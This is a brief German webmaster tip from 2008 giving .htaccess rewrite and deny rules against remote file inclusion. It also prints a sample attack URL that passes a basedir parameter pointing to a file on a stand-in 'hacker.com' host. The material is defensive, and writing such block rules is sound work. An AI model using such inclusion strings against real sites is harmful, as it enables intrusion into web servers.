Hackversuche unterbinden|
Um weitesgehend Hackversuche auf seine Webseite zu verhindern, sollte man folgendes in seiner .htaccess Datei einfügen: RewriteCond %{QUERY_STRING} http\: [OR] RewriteCond %{QUERY_STRING} .txt? RewriteRule ^(.*)$ - [F,L] Damit wird verhindert, wie unten auf dem Beispiel zu sehen ist, fremde Dateien zum Auslesen etc. einzuschleusen. Beispiel: http://DeineDomain.de/?basedir=http://www.hacker.com/hack/test.txt? Dies ist natürlich kein 100%'er Schutz gegen Hackangriffe, verhindert aber schon einiges. Hinweis für Koobi Nutzer: Sollten Sie Koobi von Dream4 verwenden, so muss die obige Lösung etwas angepasst werden. Das [OR] und RewriteCond %{QUERY_STRING} .txt? muss entfernt werden. Für Koobi Nutzer muss es demnach so aussehen: RewriteCond %{QUERY_STRING} http\: RewriteRule ^(.*)$ - [F,L] Bei anderen CMS-Systemen kann es wiederum sein, das Sie z.B. RewriteCond %{QUERY_STRING} http\: [OR] entfernen müssen. Dies müssen Sie dann jedoch beim Hersteller des jeweiligen CMS-Systems erfragen. Zusätzlich sollte man natürlich auch Dateien wie: config.php, .htaccess Dateien etc. mit unten stehendem Code vor fremden Zugriffen schützen. <Files ~ "\config.php$"> deny from all </Files> <FilesMatch "\.(php.inc|htaccess)$"> order allow,deny deny from all </FilesMatch> |
Bereich
Webmaster
Webseite
http://manni-page.de
Hersteller
Manni-Page
Letztes Update
21.09.2008 (Manni)
Wertung
|
Powered by Koobi:CMS 7 © dream4®